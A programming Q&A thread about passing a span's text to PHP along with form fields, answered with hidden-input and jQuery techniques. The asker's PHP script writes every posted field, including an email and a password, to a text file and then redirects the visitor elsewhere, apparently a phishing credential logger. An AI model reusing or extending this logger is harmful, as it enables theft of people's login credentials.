# php get input field value and span value

Tags: javascript, php, jquery, html

I have this php code to get form input values:

```
<?php
header ('Location: https://mywebsite.com/');
$handle = fopen("logs_46735.txt", "a");
foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "===============\r\n");
fclose($handle);
exit;
?>
```

That code works fine for getting input fields values, but I also have a span element in my html

```
<span id="mytext">some text</span>
```

that I would like to get together with input field values.

Example:

```
<span id="mytext">some text</span>
<input type="email" id="email" name="email" />
<input type="password" id="pass" name="pass" />
```

Is there a way to get all three values? Thanks

Answer (score 1, accepted):

It isn't possible to get the value of a span in your `$_POST` without changing it to some kind of input.

What you could do however is make a hidden input field:

`<input type="hidden" value="some text">`

which will not be shown to the user and will appear in your `$_POST` variable

Answer (score 1):

You can use the [readonly](https://www.w3schools.com/tags/att_input_readonly.asp) attribute with an input:

```html
<input type="text" id="mytext" value="some text" readonly>
<input type="email" id="email" name="email">
<input type="password" id="pass" name="pass">
```

Or [as stated by FMashiro](https://stackoverflow.com/a/43893032/6612932), if you want the input to be invisible, you can use the type `hidden`:

```html
<input type="hidden" id="mytext" value="some text">
<input type="email" id="email" name="email">
<input type="password" id="pass" name="pass">
```

Answer (score 1):

Only `<input>`, `<textarea>` and other `<select>` are send to PHP.

You can either, like said FMashiro, add a `<input type="hidden" value="some_text">`, or combine that with some javascript to set add an input, just before sending the form, with the current value you want.

Using ECMA6:

```
$("form[name=myform]").on("submit", event => {
    $("form[name=myform]").append(
        `<input name="hidden" type="hidden" value="${$("span#id").text()}" />`
    );
});
```

Or:

```
$("form[name=myform]").on("submit", function (event) {
    $("form[name=myform]").append(
        "<input name=\"hidden\" type=\"hidden\" value=\"" + $("span#id").text() + "\"/>"
    );
});
```